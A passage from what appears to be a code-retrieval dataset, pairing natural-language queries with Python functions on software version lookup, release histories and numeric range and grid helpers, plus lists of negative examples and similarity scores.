print(\"{:>{width}}\".format(get_time(total_ms), width=width))", "def query_releases(self,request):\n\n\t\t# ----------- DEBUG -----------------\n\t\tMODULE.info(\"updater/updates/query invoked with:\")\n\t\tpp = pprint.PrettyPrinter(indent=4)\n\t\tst = pp.pformat(request.options).split(\"\\n\")\n\t\tfor s in st:\n\t\t\t\tMODULE.info(\" << %s\" % s)\n\t\t# -----------------------------------\n\n\t\t# be as current as possible.\n\t\tself.uu.ucr_reinit()\n\t\tself.ucr.load()\n\n\t\tappliance_mode = self.ucr.is_true('server/appliance')\n\n\t\tresult = []\n\t\ttry:\n\t\t\trequest.status = SUCCESS\n\t\t\tavailable_versions, blocking_component = self.uu.get_all_available_release_updates()\n\t\t\tfor rel in available_versions:\n\t\t\t\tentry = {}\n\t\t\t\tentry['id'] = rel\n\t\t\t\tentry['label'] = 'UCS %s' % rel\n\t\t\t\tresult.append(entry)\n\t\t\t#\n\t\t\t# appliance_mode=no ; blocking_comp=no → add \"latest version\"\n\t\t\t# appliance_mode=no ; blocking_comp=yes → no \"latest version\"\n\t\t\t# appliance_mode=yes; blocking_comp=no → add \"latest version\"\n\t\t\t# appliance_mode=yes; blocking_comp=yes → add \"latest version\"\n\t\t\t#\n\t\t\tif len(result) and (appliance_mode or not blocking_component):\n\t\t\t\t# UniventionUpdater returns available version in ascending order, so\n\t\t\t\t# the last returned entry is the one to be flagged as 'latest' if there's\n\t\t\t\t# no blocking component.\n\t\t\t\tresult[-1]['label'] = '%s (%s)' % (result[-1]['label'],_('latest version'))\n\n\t\texcept Exception,ex:\n\t\t\trequest.status = FAILURE\n\t\t\tself.finished(request.id, [], str(ex))\n\t\t\treturn\n\n\t\t# ----------- DEBUG -----------------\n\t\tMODULE.info(\"updater/updates/query returns: %d entries\" % len(result))\n\t\tpp = pprint.PrettyPrinter(indent=4)\n\t\tst = pp.pformat(result).split(\"\\n\")\n\t\tfor s in st:\n\t\t\t\tMODULE.info(\" >> %s\" % s)\n\t\t# -----------------------------------\n\n\t\tself.finished(request.id,result)", "def fetchHistory(self, token):\n history = self.loadHistory(token)\n if len(history):\n startStamp = history[-1][\"timestamp\"] + 1000 + random.random()*1000 # Add some random number of seconds\n startDateStr = time.strftime(\"%Y%m%d\", time.gmtime(int(startStamp)))\n else:\n startDateStr = \"20130428\" # Date of the first bitcoin valuation ?\n dateStr = time.strftime(\"%Y%m%d\")\n uri = self.historyTemplate % (token, startDateStr, dateStr)\n print(\"Fetching history\")\n html = BeautifulSoup(urlrequest.urlopen(uri).read().decode(), \"html.parser\")\n print(\"parsing html\")\n dataRows = html.find(\"div\", {\"id\": \"historical-data\"}).find(\"table\", {\"id\", \"table\"}).find(\"tbody\").find_all(\"tr\", {\"class\": \"text-right\"})\n headers = [\"date.string\", \"open\", \"high\", \"low\", \"close\", \"volume\", \"market.cap\"]\n dataPts = []\n print(\"translating data\")\n for row in dataRows:\n rowObj = {}\n for i, td in enumerate(row.find_all(\"td\")):\n if i == 0:\n try:\n rowObj[headers[i]] = td.get_text()\n rowObj[\"timestamp\"] = helpers.stamp2dayStamp(datetime.datetime.strptime(td.get_text(), \"%b %d, %Y\").timestamp())\n except Exception:\n print(\"failed to parse float from `%s`\" % td.get_text())\n rowObj[headers[i]] = \"Dec 31, 1999\"\n elif i < 5:\n try:\n rowObj[headers[i]] = float(td.get_text())\n except Exception:\n print(\"failed to parse float from `%s`\" % td.get_text())\n rowObj[headers[i]] = 0.0\n else:\n try:\n rowObj[headers[i]] = int(td.get_text().replace(\",\", \"\"))\n except Exception:\n print(\"failed to parse integer from `%s`\" % td.get_text())\n rowObj[headers[i]] = 0\n dataPts.append(rowObj)\n for pt in sorted(dataPts, key=lambda p: p[\"timestamp\"]):\n if len(history) == 0 or pt[\"timestamp\"] > history[-1][\"timestamp\"]:\n history.append(pt)\n self.saveHistory(token, history)\n return history", "def release_date(self):\n for item in self.proto.releaseInfo.item:\n if item.label == 'Released on':\n return item.container.value", "def get_publication_versions(project, publication_id):\n connection = db_engine.connect()\n publication_versions = get_table(\"publication_version\")\n statement = select([publication_versions]).where(publication_versions.c.publication_id == int_or_none(publication_id))\n rows = connection.execute(statement).fetchall()\n result = []\n for row in rows:\n result.append(dict(row))\n connection.close()\n return jsonify(result)", "def svn_rev_info(path): # pragma: no cover\n if not os.path.isdir(os.path.join(path, '.svn')):\n path = os.path.join(path, '..')\n\n _program_dir = path\n filename = os.path.join(_program_dir, '.svn/entries')\n if os.path.isfile(filename):\n with open(filename) as entries:\n version = entries.readline().strip()\n if version != '12':\n for _ in range(3):\n entries.readline()\n tag = entries.readline().strip()\n t = tag.split('://', 1)\n t[1] = t[1].replace('svn.wikimedia.org/svnroot/pywikipedia/',\n '')\n tag = '[{}] {}'.format(*t)\n for _ in range(4):\n entries.readline()\n date = time.strptime(entries.readline()[:19],\n '%Y-%m-%dT%H:%M:%S')\n rev = entries.readline()[:-1]\n return tag, rev, date\n\n # We haven't found the information in entries file.\n # Use sqlite table for new entries format\n from sqlite3 import dbapi2 as sqlite\n with closing(\n sqlite.connect(os.path.join(_program_dir, '.svn/wc.db'))) as con:\n cur = con.cursor()\n cur.execute(\"\"\"select\nlocal_relpath, repos_path, revision, changed_date, checksum from nodes\norder by revision desc, changed_date desc\"\"\")\n _name, tag, rev, date, _checksum = cur.fetchone()\n cur.execute('select root from repository')\n tag, = cur.fetchone()\n\n tag = os.path.split(tag)[1]\n date = time.gmtime(date / 1_000_000)\n return tag, rev, date", "def get_github_chandra_models_version_info():\n with urlopen('https://api.github.com/repos/sot/chandra_models/tags') as url:\n response = url.read()\n tags = json.loads(response.decode('utf-8'))\n\n with urlopen('https://api.github.com/repos/sot/chandra_models/branches') as url:\n response = url.read()\n branches = json.loads(response.decode('utf-8'))\n\n all_versions_info = {t[\"name\"]: t for t in tags}\n all_versions_info.update({b[\"name\"]: b for b in branches})\n return all_versions_info", "def getVersions(self):\n logger.debug(\"Func: getVersions\")\n\n try:\n return self._currentSceneInfo[\"Versions\"]\n except:\n return []", "def GetRevisionsSample():\n client = CreateClient()\n for entry in client.GetResources(limit=55).entry:\n revisions = client.GetRevisions(entry)\n for revision in revisions.entry:\n print revision.publish, revision.GetPublishLink()", "def get_versions(start='current'):\n start = check_version_str(start)\n versions = get_linked_versions(start)\n\n results = versions[:]\n while results:\n results = get_linked_versions(results[-1])\n print results\n if results:\n versions.extend(results)\n\n versions = [x for x in set(versions) if check_manual_exists(x)]\n return sort_versions(versions, reverse=True)", "def history(self):\n return self.info['history']", "def releases(self):\r\n\r\n result = self.proxy.package_releases(self.package_name, self.include_hidden)\r\n\r\n if len(result) == 0:\r\n # no matching package--search for possibles, and limit to 15 results\r\n results = self.proxy.search({\r\n 'name': self.package_name,\r\n 'description': self.package_name\r\n }, 'or')[:15]\r\n\r\n # make sure we only get unique package names\r\n matches = []\r\n for match in results:\r\n name = match['name']\r\n if name not in matches:\r\n matches.append(name)\r\n\r\n # if only one package was found, return it\r\n if len(matches) == 1:\r\n self.package_name = matches[0]\r\n return self.releases\r\n\r\n error = \"\"\"No such package found: %s\r\n\r\nPossible matches include:\r\n%s\r\n\"\"\" % (self.package_name, '\\n'.join('\\t- %s' % n for n in matches))\r\n\r\n sys.exit(error)\r\n\r\n return result", "def greater(data, version):\n result = list()\n given_version = parse(version)\n for release, info in data.items():\n python_version = Pypi._get_python_version(info)\n ver = parse(release)\n if not ver.is_prerelease and ver > given_version:\n result.append(dict(version=str(ver), python_version=python_version))\n\n return result", "def get_comp_versions (component):\n vprint (\"Detecting current version for \" + component)\n\n regex = re.compile (r\"version \" + version_restr)\n major = component + \"_major\"\n minor = component + \"_minor\"\n micro = component + \"_micro\"\n\n\n version = (None, None, None)\n with open (doc_root + \"/ACE_TAO/\" + component + \"/VERSION.txt\") as version_file:\n for line in version_file:\n match = regex.search (line)\n if match is not None:\n version = match.groups(default=0)\n\n vprint (\"Detected version %s.%s.%s\" % version)\n\n comp_versions[major] = int (version[0])\n comp_versions[minor] = int (version[1])\n comp_versions[micro] = int (version[2])\n\n break\n\n print (\"FATAL ERROR: Unable to locate current version for \" + component)\n raise Exception\n\n # Also store the current release (old from now)\n old_comp_versions[major] = comp_versions[major]\n old_comp_versions[minor] = comp_versions[minor]\n old_comp_versions[micro] = comp_versions[micro]\n\n if opts.update:\n if opts.release_type == ReleaseType.major:\n comp_versions[major] += 1\n comp_versions[minor] = 0\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.minor:\n comp_versions[minor] += 1\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.micro:\n comp_versions[micro] += 1\n\n def make_version (versions, joiner):\n return joiner.join ([\n str (versions[component + '_' + x]) for x in ReleaseType.__members__.keys ()\n ])\n\n comp_versions [component + \"_version\"] = make_version (comp_versions, '.')\n comp_versions [component + \"_version_\"] = make_version (comp_versions, '_')\n\n comp_versions [component + \"_code\"] = \\\n (comp_versions[major] << 16) + \\\n (comp_versions[minor] << 8) + \\\n comp_versions[micro]\n\n old_comp_versions [component + \"_version\"] = make_version (old_comp_versions, '.')\n old_comp_versions [component + \"_version_\"] = make_version (old_comp_versions, '_')\n\n if opts.update:\n vprint (\"Updating from version %s to version %s\" %\n (old_comp_versions [component + \"_version\"], comp_versions [component + \"_version\"]))\n else:\n vprint (\"Found version %s\" %\n (comp_versions [component + \"_version\"]))\n\n # else:\n # comp_versions [component + \"_version\"] = \\\n # str (comp_versions[major]) + '.' + \\\n # str (comp_versions[minor])", "def get_diffs(history):\n\n # First get all possible representations\n mgr = plugins_get_mgr() \n keys = mgr.search('representation')['representation']\n representations = [mgr.get_by_key('representation', k) for k in keys]\n\n for i in range(len(history)):\n if i+1 > len(history) - 1:\n continue\n\n prev = history[i]\n curr = history[i+1]\n\n #print(prev['subject'], \"==>\", curr['subject'])\n #print(curr['changes'])\n for c in curr['changes']:\n \n path = c['path']\n\n # Skip the metadata file\n if c['path'].endswith('datapackage.json'): \n continue \n\n # Find a handler for this kind of file...\n handler = None \n for r in representations: \n if r.can_process(path): \n handler = r \n break \n \n if handler is None: \n continue \n\n # print(path, \"being handled by\", handler)\n\n v1_hex = prev['commit']\n v2_hex = curr['commit']\n\n temp1 = tempfile.mkdtemp(prefix=\"dgit-diff-\") \n \n try: \n for h in [v1_hex, v2_hex]: \n filename = '{}/{}/checkout.tar'.format(temp1, h)\n try:\n os.makedirs(os.path.dirname(filename))\n except:\n pass \n extractcmd = ['git', 'archive', '-o', filename, h, path]\n output = run(extractcmd)\n if 'fatal' in output: \n raise Exception(\"File not present in commit\") \n with cd(os.path.dirname(filename)): \n cmd = ['tar', 'xvf', 'checkout.tar']\n output = run(cmd) \n if 'fatal' in output: \n print(\"Cleaning up - fatal 1\", temp1)\n shutil.rmtree(temp1)\n continue \n\n # Check to make sure that \n path1 = os.path.join(temp1, v1_hex, path) \n path2 = os.path.join(temp1, v2_hex, path) \n if not os.path.exists(path1) or not os.path.exists(path2): \n # print(\"One of the two output files is missing\") \n shutil.rmtree(temp1)\n continue \n\n #print(path1, path2) \n\n # Now call the handler\n diff = handler.get_diff(path1, path2)\n\n # print(\"Inserting diff\", diff)\n c['diff'] = diff\n\n except Exception as e: \n #traceback.print_exc() \n #print(\"Cleaning up - Exception \", temp1)\n shutil.rmtree(temp1)", "def select_latest_micro_versions(versions):\n seen_minors = set()\n res = []\n\n for ver, _ in sorted(\n versions.items(),\n # Sort by (minor_version, upload_time) in descending order\n key=lambda x: (Version(x[0]).release[:2], x[1]),\n reverse=True,\n ):\n minor_ver = Version(ver).release[:2]\n\n if minor_ver not in seen_minors:\n seen_minors.add(minor_ver)\n res.insert(0, ver)\n\n return res", "def get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_outdated_packages(self, pip_path=\"pip\"):\n output_re = [re.compile(r) for r in [\n # newer pip\n r'^(.+) \\(Current: (.+) Latest: (.+)\\)$',\n # old pip\n r'^(.+) \\((.+)\\) - Latest: (.+) .*$',\n ]]\n pkgs = {}\n out = self.check_output(\"%s list -o\", pip_path)\n for line in out.splitlines():\n # Warning: cannot find svn location for rst2pdf==0.93.dev-r0\n # Could not find any downloads that satisfy the requirement iotop\n if line.startswith('Warning: ') or line.startswith('Could not '):\n continue\n for out_re in output_re:\n match = out_re.match(line)\n if match:\n name, current, latest = match.groups()\n pkgs[name] = {'current': current, 'latest': latest}\n break\n else:\n raise RuntimeError(\"could not parse {0}\".format(repr(line)))\n return pkgs", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def _find_latest():\n try:\n db = get_master_collection()\n service_details = db.find({\"master.key\": \"release\"}).sort([(\"master.value\", pymongo.DESCENDING)]).limit(1)\n for service in service_details:\n for r in sorted(service[\"master\"][\"value\"], reverse=True):\n latest_release = r\n build_list = service[\"master\"][\"value\"][r]\n break\n break\n\n latest_rel_num = str(latest_release).replace(\"_\", \".\")\n build_list = _natural_sort(build_list)\n for build in build_list:\n latest_build = build\n break\n\n latest_build_num = latest_build\n second_latest_build_num = int(latest_build_num) - 1\n latest = {\"latest_val\": latest_rel_num + \"_\" + latest_build_num,\n \"second_latest_val\": latest_rel_num + \"_\" + str(second_latest_build_num)}\n except Exception as e:\n logger.error(\"Exception in _find_latest : \" + str(e))\n return latest" ]
[ "0.6942631", "0.66807014", "0.6496823", "0.6251065", "0.6223727", "0.61681485", "0.607848", "0.605974", "0.6022348", "0.5989354", "0.59570056", "0.59270537", "0.5916981", "0.58646035", "0.5862971", "0.5855767", "0.5854523", "0.5853826", "0.58354694", "0.5833912", "0.58016866", "0.57994175", "0.5793847", "0.5746684", "0.5738796", "0.572935", "0.57211924", "0.5691585", "0.5677908", "0.5586303", "0.55843425", "0.5574024", "0.55555063", "0.5552908", "0.5476721", "0.54714394", "0.54595387", "0.545562", "0.54363096", "0.5424815", "0.541594", "0.5409819", "0.53944", "0.5383161", "0.5376013", "0.53470004", "0.5320263", "0.5311043", "0.5308224", "0.530511", "0.5304686", "0.52877504", "0.52849483", "0.52709794", "0.5261199", "0.5259902", "0.52236193", "0.52154773", "0.5167841", "0.51675165", "0.51654625", "0.51570696", "0.5132246", "0.5130527", "0.5129829", "0.5127437", "0.51268697", "0.5124996", "0.51142967", "0.5091579", "0.508297", "0.5080641", "0.50684386", "0.5036047", "0.5032809", "0.5031221", "0.5030927", "0.50291276", "0.50286126", "0.5023804", "0.50194824", "0.5016323", "0.4989104", "0.49882242", "0.49750924", "0.49718353", "0.49712974", "0.49671388", "0.4957768", "0.49558762", "0.49330983", "0.4929224", "0.49257073", "0.49222586", "0.49201712", "0.4918709", "0.49161118", "0.49135122", "0.49090317", "0.49070027" ]
0.6868364
1
Calculates X values for given list of Y values in range defined by a and b parameters. X values are simply calculated by dividing given X range by number of nodes, so they are distributed in even range.
def prepare_initial_nodes(x_start, x_end, nodes_y): nodes_x = [float(x_start + ((x_end - x_start) / (len(nodes_y) - 1)) * i) for i in range(0, len(nodes_y))] nodes_y = [float(y) for y in nodes_y] print(nodes_x) print(nodes_y) nodes = list(zip(nodes_x, nodes_y)) return nodes
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def projectionX(xdata, ydata, nbins, xrange=None, yrange=None):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = bin_data.size\n x_out += dx / 2.\n x_out = x_out[:-1]\n return x_out, y_out", "def neural_dist(func_a, func_b, x_range):\n func_a = func_a.numpy()\n func_b = func_b.numpy()\n return func_a.fit(func_b, x_range=x_range)[1]", "def calculate_ranges(a, b):\n try:\n ranges = list(range(0, a, a//b))\n if ranges[-1] != a:\n ranges.append(a)\n return ranges\n except ValueError:\n return [0, a]", "def profileX(xdata, ydata, nbins, xrange=None, yrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n y_err = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = np.mean(bin_data)\n y_err[i] = np.std(bin_data) / bin_data.size**0.5\n x_out += dx / 2.\n x_out = x_out[:-1]\n if drop_nan:\n selection = ~(np.isnan(y_out) | np.isnan(y_err))\n x_out = x_out[selection]\n y_out = y_out[selection]\n y_err = y_err[selection]\n return x_out, y_out, y_err", "def plot_linear(x_range, w, b):\n\tplt.plot(x_range, x_range * w + b)", "def fit_to_range(val: float, a: float, b: float, a1: float, b1: float) -> float:\n new_value = ((val - a) / (b - a)) * (b1 - a1) + a1\n return new_value", "def rangeX(iterations):\n if not isinstance(iterations, (tuple)):\n raise AttributeError\n return itertools.product(*map(range, iterations))", "def to_arrays(self, xmin=None, xmax=None):\n sidx = 0 if xmin is None else np.searchsorted(self.xvec, [xmin])[0]\n eidx = len(self.xvec) if xmax is None else np.searchsorted(self.xvec, [xmax])[0]\n\n if eidx < len(self.xvec) and self.xvec[eidx] == xmax:\n eidx += 1\n\n xtemp = self.xvec[sidx:eidx]\n if xmin is not None and (len(xtemp) == 0 or xtemp[0] != xmin):\n np.insert(xtemp, 0, [xmin])\n if xmax is not None and (len(xtemp) == 0 or xtemp[-1] != xmax):\n np.append(xtemp, [xmax])\n return xtemp, self(xtemp)", "def grid(x, y):\n return product(xrange(1, x+1), xrange(1, y+1))", "def slice_data(xdata, ydata, x_range):\n\tdata = zip(xdata, ydata)\n\tsliced_data = [d for d in data if d[0] >= x_range[0] and d[0] <= x_range[1]]\n\treturn array(zip(*sliced_data))", "def _lagrange2(x, y):\n\n def P(x_ip):\n total = 0\n n = len(x)\n for i in range(0, n):\n\n def g(i, n):\n tot_mul = 1\n for j in range(0, n):\n if i == j:\n continue\n if x[i] == x[j]:\n log.fatal(\n f\"Leads to division by zero (x = {x[i]}). Identical values given in x array. \"\n \"For example by using Lagrange interpolation for precise orbit, \"\n \"check if identical observation epochs are given in SP3 file\"\n )\n tot_mul *= (x_ip - x[j]) / float(x[i] - x[j])\n return tot_mul\n\n total += y[i] * g(i, n)\n return total\n\n return P", "def make_uniform_x(self, x_resolution, min_x = None, max_x = None, bin_above = 2.0, **kwargs):\n \n if min_x is None or max_x is None:\n a, b = self.get_min_max_x(**kwargs)\n if min_x is None:\n min_x = a\n if max_x is None:\n max_x = b\n \n new_x = numpy.arange(min_x, max_x + x_resolution / 2, x_resolution)\n \n for m in range(len(self.mess)):\n if m not in exclude and self.mess[m][\"class\"] not in exclude:\n resolution = (numpy.amax(m.x) - numpy.amin(m.x)) / len(m.x)", "def calculate(\n expression: str, symmetrical_bounds: Union[int, float] = 10\n ) -> Tuple[np.ndarray, np.ndarray]:\n symmetrical_bounds = abs(symmetrical_bounds)\n x = np.arange(-symmetrical_bounds, symmetrical_bounds, symmetrical_bounds / 50)\n expr = parse_expr(expression)\n x_symbol = Symbol(\"x\")\n\n y = np.array([expr.subs({x_symbol: x_point}).evalf() for x_point in x])\n\n return x, y", "def scale(x, a=5, b=10, xmin=-1, xmax=1):\n return (b - a)*(x - xmin)/(xmax - xmin) + a", "def projectionY(xdata, ydata, nbins, yrange=None, xrange=None):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(ymin, ymax, nbins+1)\n y_out = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(ydata, x_out[i], x_out[i+1]), xdata)\n y_out[i] = bin_data.size\n x_out += dx / 2.\n x_out = x_out[:-1]\n return x_out, y_out", "def create_grid(xlim, ylim, step):\n x_range = np.arange(xlim[0], xlim[1], step)\n y_range = np.arange(ylim[0], ylim[1], step)\n return x_range, y_range", "def calc(x_list):\n\n y_list = [x**2 + 2*x + 1 for x in x_list]\n\n return y_list", "def plot(self, a=None, b=None):\n\n # === choose reasonable interval if [a, b] not specified === #\n if a is None:\n a = self.observations.min() - self.observations.std()\n if b is None:\n b = self.observations.max() + self.observations.std()\n\n # === generate plot === #\n x_vals = np.linspace(a, b, num=100)\n f = np.vectorize(self.__call__)\n plt.plot(x_vals, f(x_vals))\n plt.show()", "def scale(x_range=1, y_range=1):\r\n x = rand_val(x_range)\r\n y = rand_val(y_range)\r\n return np.array(((x, 0, 0),\r\n (0, y, 0),\r\n (0, 0, 1)), dtype=np.float)", "def plot(self, center=0, xmin=-1, xmax=1):\n if self.eps == 0:\n return [xmin, center, center, xmax], [0, 0, 1, 1]\n else:\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, center-self.eps, 21),\n linspace(center-self.eps, center+self.eps, n+1),\n linspace(center+self.eps, xmax, 21))\n y = self(x)\n return x, y", "def project_weights_and_nodes(a, b, unit_weights, unit_nodes):\n\n\t# project onto interval [a,b]\n\tnodes = 0.5*(b-a)*unit_nodes + 0.5*(a+b)\n\tweights = 0.5*(b-a)*unit_weights\n\n\treturn weights, nodes", "def toPointwise_withLinearXYs( self, accuracy, biSectionMax = 16, **kwargs ) :\n\n if( accuracy < 1e-6 ) : accuracy = 1e-6\n if( accuracy > 0.1 ) : accuracy = 0.1\n\n P, n = [], 1000\n for i in xrange( n + 1 ) :\n x = ( ( n - i ) * self.domainMin + self.domainMax * i ) / n\n P.append( [ x, self.evaluate( x ) ] )\n axes = axesModule.axes( )\n yUnit = self.getAxisUnitSafely( 0 )\n xUnit = self.getAxisUnitSafely( 1 )\n axes[0] = axesModule.axis( 'y(x)', 0, yUnit )\n axes[1] = axesModule.axis( 'x', 1, xUnit )\n Pclass = self.toLinearXYsClass()\n P = Pclass( P, accuracy = accuracy, axes = axes )\n return( P.thin( accuracy = accuracy ) )", "def data_range(xs: List[float]) -> float:\n return max(xs) - min(xs)", "def getCellData(X, y, min0, max0, min1, max1):\n Xcell = []\n ycell = []\n\n for x,label in zip(X, y):\n if (x[0] >= min0) and (x[0] < max0) and (x[1] >= min1) and (x[1] < max1):\n Xcell.append(x)\n ycell.append(label)\n\n return np.array(Xcell), np.array(ycell)", "def makeCrossPlotX(f,g):\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(1,n1-1):\n x[i2][i1] = 0.5*(f[i2][i1+1]-f[i2][i1-1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y", "def __call__(self, x, y):\n xa = np.asarray(x)\n ya = np.asarray(y)\n return (self._evaluate(xa.flatten(), ya.flatten())).reshape(xa.shape)", "def get_densities(\n x: np.ndarray,\n y: np.ndarray,\n nx: int,\n ny: int,\n x_range: Tuple = (0, 100),\n y_range: Tuple = (0, 100),\n n: int = 30,\n) -> np.ndarray:\n\n x_values = np.linspace(x_range[0], x_range[1], nx)\n y_values = np.linspace(y_range[0], y_range[1], ny)\n\n density = np.empty((nx, ny))\n tree = get_kdtree(x, y)\n\n for x in tqdm(range(nx)):\n for y in range(ny):\n density[x, y] = get_density_from_neighbours(\n x_values[x], y_values[y], tree, n\n )\n\n return density, tree", "def coords_in_range(self, anchor, steps):\n coords = list()\n x_low = -steps\n x_high = steps\n\n #Generate using an axial formula to make it easier\n #calculate z via the other two and throw away ones that aren't in bounds\n for x in range(x_low, x_high+1):\n for y in range(max(-steps, -x-steps), min(steps, -x+steps)+1):\n z = -x - y\n coords.append(anchor+self.coord(x, y, z))\n return coords", "def alpha_range(x0, x1, x_min, x_max):\n if x0 == x1:\n raise ValueError('x1 and x2 should be different, get {} and {}'.format(x0, x1))\n alpha_x1 = (x_min - x0) / (x1 - x0)\n alpha_x2 = (x_max - x0) / (x1 - x0)\n alpha_min = max(0, min(alpha_x1, alpha_x2))\n alpha_max = min(1, max(alpha_x1, alpha_x2))\n return alpha_min, alpha_max", "def nll(x, a, b):\n x = _validate_x_bounds(x, low=0, high=1, strict_low=True, strict_high=True)\n return -mp.fsum([logpdf(t, a, b) for t in x])", "def lin_scale( val, x1, y1, x2, y2 ):\r\n x_range = (x2 - x1)\r\n new_val = 0\r\n if x_range is 0:\r\n new_val = y1\r\n else:\r\n y_range = ( y2 - y1 )\r\n new_val = ( ( ( val - x1 ) * y_range ) / x_range ) + y1\r\n\r\n return new_val", "def monte_carlo_integration(f, n, a, b, ret_arrays=False):\n x = np.random.uniform(0, 1, n)*(b-a)+a\n f_array = f(x)\n\n positive_x = x[f_array >= 0]\n negative_x = x[f_array < 0]\n if positive_x.size > 0:\n h = np.max(f_array)\n else:\n h = np.max(-f_array)\n \n y_positive = np.random.uniform(0, 1, positive_x.size)*h\n y_negative = np.random.uniform(0, 1, negative_x.size)*h\n \n xy_indices_below = y_positive <= f(positive_x)\n xy_indices_above = y_negative <= -f(negative_x)\n n_inside_below = y_positive[xy_indices_below]\n n_inside_above = -y_negative[xy_indices_above]\n \n if ret_arrays:\n n_inside_x = np.append(positive_x[xy_indices_below],negative_x[xy_indices_above])\n n_inside_y = np.append(n_inside_below, n_inside_above)\n return n_inside_x, n_inside_y\n \n return h*(b-a)*(n_inside_below.size-n_inside_above.size)/(n)", "def bws(x, y, **kwargs):\n\tx.sort()\n\ty.sort()\n\tnpx = np.array(x)\n\tnpy = np.array(y)\n\n\txs = np.unique(npx)\n\tys = np.unique(npy)\n\txys = set(xs).union(set(ys))\n\taxy = np.array(list(xys))\n\taxy.sort()\n\n\tG = np.array([len(axy[np.where(axy <= xi)]) for xi in xs])\n\tH = np.array([len(axy[np.where(axy <= yi)]) for yi in ys])\n\n\tn = len(G)\n\tm = len(H)\n\tfn = float(n)\n\tfm = float(m)\n\n\tN = np.linspace(1,n,num=n)\n\tM = np.linspace(1,m,num=m)\n\n\txt1 = np.power(G - N*(fm + fn)/fn, 2.0)\n\txtt = N/(fn+1.0)\n\txt2 = xtt*(1 - xtt)*(fm * (fm+fn)/fn)\n\tBx = np.sum(xt1/xt2)/fn\n\t\n\tyt1 = np.power(H - M*(fm + fn)/fm, 2.0)\n\tytt = M/(fm+1.0)\n\tyt2 = ytt*(1 - ytt)*(fn * (fm+fn)/fm)\n\tBy = np.sum(yt1/yt2)/fm\n\n\tB = (Bx+By)/2.0\n\n\tprint \"B = \", B\n\t\n\tJ = 3\n\tif \"j\" in kwargs:\n\t\tJ = kwargs[\"j\"]\n\t\n\treturn compute_xi(B, J)", "def getx(v, lb, ub, i, B):\r\n x = lb + np.multiply((ub - lb), v)\r\n x[i] = B - (x.sum() - x[i])\r\n # Test if variable x[i] is within the bounds\r\n if x[i] <= ub[i] and x[i] >= lb[i]:\r\n return x\r\n else:\r\n return np.array([])", "def generate_points(r_squared, min_val=5, max_val=100):\n r = sqrt(r_squared)\n x_list = []\n lb_list = []\n ub_list = []\n for i in range(min_val, max_val):\n x_list.append(i)\n lb, ub = pearson_confidence(r, i)\n lb_list.append(lb)\n ub_list.append(ub)\n return np.array(x_list), np.array(lb_list) ** 2, np.array(ub_list) ** 2", "def axis_range ( xmin , xmax , delta = 0.05 , log = False ) :\n xmn = min ( xmin , xmax )\n xmx = max ( xmin , xmax )\n \n import math\n \n ## 1) special case\n if isequal ( xmn , xmx ) :\n return math.floor ( xmn - 0.1 ) , math.ceil ( xmx + 0.1 ) \n\n ## 2) special case\n if islong ( xmn - 0.5 ) and islong ( xmn + 0.5 ) :\n return math.floor ( xmn - 0.1 ) , math.ceil ( xmx + 0.1 ) \n\n d = xmx - xmn\n \n if 0 <= xmn < xmx :\n \n xmin = max ( 0 , xmn - delta * d )\n xmax = xmx + delta * d \n \n elif xmn < xmx <= 0 :\n \n xmin = xmn - delta * d \n xmax = max ( 0 , xmx + delta * d )\n \n elif xmn < 0 < xmx :\n \n xmin = ( 1 + delta ) * xmn \n xmax = ( 1 + delta ) * xmx\n \n else : \n \n xmin = xmn - delta * d \n xmax = xmx + delta * d \n\n N = 3\n \n a1 , b1 = frexp10 ( xmin )\n a2 , b2 = frexp10 ( xmax )\n\n b1 -= N \n b2 -= N \n \n xmin = math.floor ( a1 * ( 10**N ) ) * ( 10 ** b1 )\n xmax = math.ceil ( a2 * ( 10**N ) ) * ( 10 ** b2 )\n \n return xmin , xmax", "def ni_range(x0, x1, dx=1):\n # sanity check arguments\n if dx==0:\n raise ValueError(\"invalid parameters: dx==0\")\n if 